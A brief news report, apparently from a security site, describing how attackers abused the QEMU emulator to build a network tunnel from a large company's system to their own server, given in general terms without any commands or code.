Malicious actors were detected abusing the open-source hypervisor platform QEMU as a tunneling tool in a cyberattack against a large company.
QEMU is a free emulator and hypervisor that allows you to run other operating systems as guests on a computer.
As part of the attack, threat actors used QEMU to create virtual network interfaces and a socket-type network device to connect to a remote server. This allowed the threat actors to create a network tunnel from the victim’s system to the attacker’s server with negligible impact on system performance.
Comments are closed.